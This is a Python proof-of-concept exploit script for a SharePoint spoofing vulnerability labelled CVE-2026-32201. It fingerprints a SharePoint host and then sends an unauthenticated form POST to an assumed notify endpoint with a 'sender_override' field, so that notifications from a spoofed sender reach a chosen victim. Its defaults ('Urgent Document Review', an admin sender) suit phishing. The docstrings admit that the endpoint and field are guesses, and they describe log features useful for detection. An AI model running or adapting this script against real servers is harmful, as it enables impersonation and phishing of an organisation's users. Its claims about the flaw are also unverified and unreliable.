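#!/usr/bin/env python3
"""
CVE-2026-32201 SharePoint Server Spoofing Exploit (Conceptual PoC for Pentesting)

This script demonstrates a conceptual exploitation of CVE-2026-32201, an
improper input validation vulnerability in Microsoft SharePoint Server
allowing unauthenticated network spoofing.

Usage for authorized pentest:
1. Pass the SharePoint host under test as the positional ``target`` argument.
2. Customize payload for spoofed sender/content (--sender, --recipient,
   --subject, --message).
3. Run and check server response/logs for success indicators.

Reading the results:
- The pre-check only fingerprints SharePoint. It does not test for the flaw,
  so passing it says nothing about the host's patch level.
- The default endpoint and the ``sender_override`` field are this script's own
  assumptions (the PoC is conceptual); nothing in this file confirms that they
  exist on a real server.
- On the wire the script produces one GET for /_layouts/15/start.aspx followed
  by one unauthenticated, form-encoded POST to the endpoint carrying the
  fields recipient, subject, message and sender_override, with a fixed
  User-Agent. These are the request features to search for in web-server or
  proxy logs when validating detection coverage.
"""

import argparse
import sys
from urllib.parse import urljoin, urlsplit

import requests


def check_vulnerability(target_url):
    """Report whether ``target_url`` answers like a SharePoint site.

    Despite its name this is a product fingerprint, not a vulnerability
    check: it requests /_layouts/15/start.aspx and looks for the string
    "SharePoint" in a 200 response. A patched server passes it as well.

    Args:
        target_url: Base URL of the host under test.

    Returns:
        True if the fingerprint matched, False otherwise (including when the
        request could not be made).
    """
    try:
        probe_url = urljoin(target_url, "/_layouts/15/start.aspx")
        # Context manager so the connection pool is released on every path.
        with requests.Session() as session:
            resp = session.get(probe_url, timeout=10)
            fingerprint_ok = resp.status_code == 200 and "SharePoint" in resp.text
    except (requests.exceptions.RequestException, ValueError) as e:
        # Only transport/URL errors are expected here; anything else is a
        # programming error and should surface instead of being reported as
        # "not SharePoint".
        print(f"[-] Fingerprint error: {e}")
        return False

    if fingerprint_ok:
        print("[+] SharePoint detected.")
        return True
    print("[-] No SharePoint response.")
    return False


def exploit(target_url, recipient, subject, message, spoofed_sender,
            endpoint="/_layouts/15/notify.aspx"):
    """Send the PoC's single form-encoded POST and print what came back.

    Args:
        target_url: Base URL of the host under test.
        recipient: Value sent in the ``recipient`` form field.
        subject: Value sent in the ``subject`` form field.
        message: Value sent in the ``message`` form field.
        spoofed_sender: Value sent in the ``sender_override`` form field.
        endpoint: Path joined onto ``target_url``; must stay on the same
            scheme and host as ``target_url``.

    Returns:
        None. Everything is reported on stdout; none of the printed
        indicators is proof that a notification was delivered.
    """
    exploit_url = urljoin(target_url, endpoint)

    # urljoin() lets an absolute or scheme-relative ``endpoint`` replace the
    # host entirely. Refuse that, so the request cannot leave the host that
    # was named as the target (or silently drop from https to http).
    base, dest = urlsplit(target_url), urlsplit(exploit_url)
    if (base.scheme.lower(), base.netloc.lower()) != (dest.scheme.lower(), dest.netloc.lower()):
        print(f"[-] Endpoint resolves outside the target ({exploit_url}); not sending.")
        return

    payload = {
        "recipient": recipient,
        "subject": subject,
        "message": message,
        "sender_override": spoofed_sender  # Vulnerable param: insufficient sanitization
    }

    print(f"[*] Sending spoofed request to {exploit_url}")
    print(f"[*] Spoofed sender: {spoofed_sender}")
    print(f"[*] Target recipient: {recipient}")

    try:
        with requests.Session() as session:
            session.headers.update({
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Content-Type": "application/x-www-form-urlencoded",
            })
            resp = session.post(exploit_url, data=payload, timeout=15, allow_redirects=True)

        print(f"[+] Status: {resp.status_code}")
        print(f"[+] Response length: {len(resp.text)}")
        if resp.history:
            # Redirects are followed, so the status above belongs to the final
            # page (for example a sign-in page), not to the endpoint itself.
            print(f"[*] Redirected to {resp.url}; status reflects that page.")

        if resp.status_code == 200:
            print("[+] Potential success: Check target logs/email for spoofed content.")
            # Plain substring heuristic: it also matches unrelated page text,
            # so confirm against server-side logs or the recipient mailbox.
            body = resp.text.lower()
            if "success" in body or "sent" in body:
                print("[+] Spoofing confirmed via response.")
        else:
            print("[-] Server rejected request (patched or invalid endpoint?).")

        # The body is server-controlled; repr() keeps control characters and
        # terminal escape sequences from being interpreted by the console.
        print("[*] Response snippet:", repr(resp.text[:500]))
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit error: {e}")


def main():
    """Parse the command line, fingerprint the target, then run the PoC.

    Exits with status 1 when the fingerprint step does not match.
    """
    parser = argparse.ArgumentParser(description="CVE-2026-32201 SharePoint Spoofing PoC")
    parser.add_argument("target", help="Target SharePoint URL (e.g., https://sharepoint.example.com)")
    parser.add_argument("--recipient", required=True, help="Victim email/recipient")
    parser.add_argument("--subject", default="Urgent Document Review", help="Notification subject")
    parser.add_argument("--message", default="Please review attached.", help="Notification body")
    parser.add_argument("--sender", required=True, help="Spoofed sender (e.g., admin@target.com)")
    parser.add_argument("--endpoint", default="/_layouts/15/notify.aspx", help="Vulnerable endpoint")

    args = parser.parse_args()

    print("CVE-2026-32201 SharePoint Spoofing Exploit")
    print("CVSS: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)")
    print("=" * 60)

    # A bare hostname is treated as https.
    if not args.target.startswith(("http://", "https://")):
        args.target = "https://" + args.target

    if not check_vulnerability(args.target):
        sys.exit(1)
    exploit(args.target, args.recipient, args.subject, args.message, args.sender, args.endpoint)


if __name__ == "__main__":
    main()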